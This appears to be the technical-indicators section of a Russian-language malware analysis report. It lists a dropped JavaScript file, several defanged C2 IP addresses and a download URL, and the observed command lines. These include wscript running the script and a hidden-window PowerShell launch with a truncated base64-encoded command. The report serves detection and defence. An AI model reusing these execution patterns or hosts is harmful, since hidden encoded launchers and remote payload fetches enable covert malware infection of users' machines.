Техническая информация
- %ALLUSERSPROFILE%\lexicostatisticshadowfoot.js
- '23#.#49.178.236':80
- '12#.#1.216.203':80
- '15#.#36.14.179':80
- '19#.#21.17.68':80
- '19#.#21.17.92':80
- http://19#.#21.17.68/9Cm9EW/kEPzf2Djjl8
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\lexicostatisticShadowfoot.js" Disceptation goldenmouthed Reductio wahlund
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedcommand "JAB3AGgAaQB0AHQAcgBlAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB1AEEASABRAEEAWgBRAEIAdQBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBUAFEAQgBoAEEA... (со скрытым окном)
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\lexicostatisticShadowfoot.js" Disceptation goldenmouthed Reductio wahlund (со скрытым окном)